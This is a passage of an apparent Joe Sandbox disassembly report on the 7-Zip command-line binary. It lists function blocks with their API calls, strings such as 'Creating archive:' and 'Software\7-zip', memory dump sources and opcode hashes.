                                                                                                                                          • Part of subcall function 00246618: FormatMessageW.KERNEL32 ref: 00246676
                                                                                                                                          • Part of subcall function 00246618: LocalFree.KERNEL32 ref: 00246698
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 0024237E
                                                                                                                                          • Part of subcall function 00242320: fputs.MSVCRT ref: 002423B8
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 002423C4
                                                                                                                                          • Part of subcall function 00242300: fputc.MSVCRT ref: 00242311
                                                                                                                                        • free.MSVCRT ref: 00286BAE
                                                                                                                                        • fputs.MSVCRT ref: 00286BCC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputsfree$FormatFreeLocalMessagefputc
                                                                                                                                        • String ID: : $----------------
                                                                                                                                        • API String ID: 1215563195-4071417161
                                                                                                                                        • Opcode ID: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
                                                                                                                                        • Instruction ID: 5a5b389cfc9addbb0007dbafe22140116f38e834ad3e8993d39ee9adddd9cc13
                                                                                                                                        • Opcode Fuzzy Hash: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
                                                                                                                                        • Instruction Fuzzy Hash: 1D018476711945C5DA24EF27E98472E3321F785BE8F548225EE6E077A4CF38C85ACB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                        • Instruction ID: ecff6f1f6c9c1f269e9ea5971c26354c95d7807df854101bdf3774157f8fed08
                                                                                                                                        • Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                        • Instruction Fuzzy Hash: B4F03113722890C5CB19BF37DC5116C2368AF96FD47994161BF1D5B356CE20C8A78780
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 0028BCD4
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 0024237E
                                                                                                                                          • Part of subcall function 00242320: fputs.MSVCRT ref: 002423B8
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 002423C4
                                                                                                                                        • fputs.MSVCRT ref: 0028BD17
                                                                                                                                          • Part of subcall function 00242300: fputc.MSVCRT ref: 00242311
                                                                                                                                        • free.MSVCRT ref: 0028BD2B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputsfree$fputc
                                                                                                                                        • String ID: : $Write SFX:
                                                                                                                                        • API String ID: 3584323934-2530961540
                                                                                                                                        • Opcode ID: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
                                                                                                                                        • Instruction ID: 4771da53209eecbbf61b881f64117762a4b4fa931f9eee2f34da7b48278ff85f
                                                                                                                                        • Opcode Fuzzy Hash: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
                                                                                                                                        • Instruction Fuzzy Hash: 2C016C5631198080DF20DF26D85435E5331E784FF4F48D331AE2E477A9DE28C59AC710
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 0028BB49
                                                                                                                                        • fputs.MSVCRT ref: 0028BB76
                                                                                                                                          • Part of subcall function 00242568: free.MSVCRT ref: 002425B5
                                                                                                                                          • Part of subcall function 00242568: free.MSVCRT ref: 002425C0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputsfree
                                                                                                                                        • String ID: Creating archive: $StdOut$Updating archive:
                                                                                                                                        • API String ID: 2581285248-1319951512
                                                                                                                                        • Opcode ID: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
                                                                                                                                        • Instruction ID: 23abd4b78578ae1f701367e1a2795451de6b40ab5a29a1b6700d17f15e799f6f
                                                                                                                                        • Opcode Fuzzy Hash: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
                                                                                                                                        • Instruction Fuzzy Hash: 3CF062A9722A85C1DE09DF26D99835C2321AB49FD9F48D4369D0E0B758DF28C4AD8700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                        • Instruction ID: 4803adab25eb10f7e47c047478445f4d680a3473ebf6d44d8ae73c9088232131
                                                                                                                                        • Opcode Fuzzy Hash: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                        • Instruction Fuzzy Hash: DAE0DC12630444C1DB18FF77DC9112C23A8EFD5F447541051BF2D4B327CD10C8A68784
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                        • Instruction ID: 2ec7c43aacb9c8499220e6d6bbc3cf81e02d57e83bee35dcb2ea505808268f3d
                                                                                                                                        • Opcode Fuzzy Hash: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                        • Instruction Fuzzy Hash: 0A815373311AC185CB14EF2AD8842AD73A6F785F98F584122DE5E0BB69CF34C89AC714
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Q
                                                                                                                                        • API String ID: 0-3463352047
                                                                                                                                        • Opcode ID: bc9be63d504983c28c946ff15751b1acb9468e174f89d66a9808b591d5803b6e
                                                                                                                                        • Instruction ID: 4ebbce24d49ec4781461069e2d64a63edacc9ebc244b5da3b2a2e10644e3d791
                                                                                                                                        • Opcode Fuzzy Hash: bc9be63d504983c28c946ff15751b1acb9468e174f89d66a9808b591d5803b6e
                                                                                                                                        • Instruction Fuzzy Hash: B8618166328A81C2CF20DF25E48066EB761F7C4B94F555221FB9A577A8DF78C8A5CB00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID: act:$ cpus:$ gran:$ page:
                                                                                                                                        • API String ID: 1294909896-454015223
                                                                                                                                        • Opcode ID: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                        • Instruction ID: b6d17e73ec719ad52ca318354a362d75ae5d472e311a5804c96b8fbfadc1883b
                                                                                                                                        • Opcode Fuzzy Hash: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                        • Instruction Fuzzy Hash: 2251C865760602D2DE2CEF13E9513A82721EB897D0FC49132EE0A57B58DFB8C579CB44
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 002501D7
                                                                                                                                        • _CxxThrowException.MSVCRT ref: 002502EA
                                                                                                                                          • Part of subcall function 0024FD30: _CxxThrowException.MSVCRT ref: 0024FE50
                                                                                                                                        • _CxxThrowException.MSVCRT ref: 0025031F
                                                                                                                                        Strings
                                                                                                                                        • There is no second file name for rename pair:, xrefs: 00250302
                                                                                                                                        • Empty file path, xrefs: 002502CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionThrow$free
                                                                                                                                        • String ID: Empty file path$There is no second file name for rename pair:
                                                                                                                                        • API String ID: 3129652135-1725603831
                                                                                                                                        • Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                        • Instruction ID: 28214e700d9b78c8e740184b5fd42e0e31bcb0bffd0a511b4807bfc61904f175
                                                                                                                                        • Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                        • Instruction Fuzzy Hash: 3C41F372224680C1CA30EF19E88479A7B20F3867B4F508712DEB9477D9DB78C4A9CB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLastSecurity
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 555121230-0
                                                                                                                                        • Opcode ID: bffbdd1f625258c57141ceb8c602dbdbd1fc5505a6e0575fc25b2b176440912e
                                                                                                                                        • Instruction ID: 23436a56b9b5db08fb3044d6b4db8abf91cc11c31845e8876ea0d8ea5b7e3e3f
                                                                                                                                        • Opcode Fuzzy Hash: bffbdd1f625258c57141ceb8c602dbdbd1fc5505a6e0575fc25b2b176440912e
                                                                                                                                        • Instruction Fuzzy Hash: 7B41BD33311A8196C760CF26E8847AA73A6F384B98F994131DE4E8BB14EF30CC96D751
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID: = $h<)
                                                                                                                                        • API String ID: 1294909896-1931583223
                                                                                                                                        • Opcode ID: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                        • Instruction ID: 59cb1c41cbd57b66fee19eeeb024d73ca781365112e32697b575e30cbc16fc48
                                                                                                                                        • Opcode Fuzzy Hash: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                        • Instruction Fuzzy Hash: 3F31B566336A81D6CB14FF55E48035EB724F7D1760F944222FA8E43AA8EB78C959CF00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID: #
                                                                                                                                        • API String ID: 1294909896-1885708031
                                                                                                                                        • Opcode ID: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                        • Instruction ID: 0e4f913c5bfdae06fa85b321db67251dcc8c26714dfeec3f4289f5e0fc82cba2
                                                                                                                                        • Opcode Fuzzy Hash: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                        • Instruction Fuzzy Hash: B231F423324A9081CB20DF15D94045EA768FBD87E4F954265FF9F4B768CE38C8A6CB10
                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00243E32), ref: 00243D18
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00243E32), ref: 00243D25
                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00243D4E
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00243E32), ref: 00243DC1
                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00243DFA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2296236218-0
                                                                                                                                        • Opcode ID: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                        • Instruction ID: f2bb754a153bc0573642627a425a25b86fdb969c10b6eee9aa0b83471d0eec11
                                                                                                                                        • Opcode Fuzzy Hash: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                        • Instruction Fuzzy Hash: BA31EF73705BC68ACB64CF25E48435EBBA5F789B94F558021DA8963B24DB38C8A1CB01
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                        • Instruction ID: aa5a8a1cb72aae8217e3f500ac03e9d3af7d67b4238b901e4229259a8015e7a5
                                                                                                                                        • Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                        • Instruction Fuzzy Hash: D3217F6B322A8085CB29EF36D4503296360EB85FA8F694221DF2D17B99CF35C855C310
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Create$CloseHandleTimefree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 234454789-0
                                                                                                                                        • Opcode ID: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                        • Instruction ID: 093ad1835cc27930088d5ca7531d95f88c8bacd28c23aaa7147538bd7205b6c2
                                                                                                                                        • Opcode Fuzzy Hash: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                        • Instruction Fuzzy Hash: 1421083631068186D624DF16FA58B5A6720F386BF8F544321EE7947BD8DF38C99ACB01
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                        • Opcode ID: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                        • Instruction ID: 51b2a647b0d5b1e8fb57c7e132e6e0cd8e02c7398fa91d29d44fed1084ae9046
                                                                                                                                        • Opcode Fuzzy Hash: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                        • Instruction Fuzzy Hash: 0711EEA5326741D1EF04AF269D593B823619B09FC4FD58421DE0A9B346EFB8CEA6C301
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0024B544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,002682CA), ref: 0024B56F
                                                                                                                                          • Part of subcall function 0024B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0024B4AA
                                                                                                                                          • Part of subcall function 0024B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0024B4F8
                                                                                                                                        • free.MSVCRT ref: 00268343
                                                                                                                                          • Part of subcall function 00243404: free.MSVCRT ref: 00243431
                                                                                                                                          • Part of subcall function 00243404: memmove.MSVCRT ref: 0024344C
                                                                                                                                          • Part of subcall function 00248624: free.MSVCRT ref: 002486A9
                                                                                                                                        • free.MSVCRT ref: 0026832B
                                                                                                                                        • free.MSVCRT ref: 00268336
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$QueryValue$Openmemmove
                                                                                                                                        • String ID: 7z.dll$Software\7-zip
                                                                                                                                        • API String ID: 2771487249-1558686312
                                                                                                                                        • Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                        • Instruction ID: c6a33fe74ca1098733e03030d1325b6e66a93d043ec7f0af744d29512ebf8fff
                                                                                                                                        • Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                        • Instruction Fuzzy Hash: E811CA5132498090CA24EB11E5513DE6324EBD5BE4FC41211BE5D47766DF28C69ECF00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3873070119-0
                                                                                                                                        • Opcode ID: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
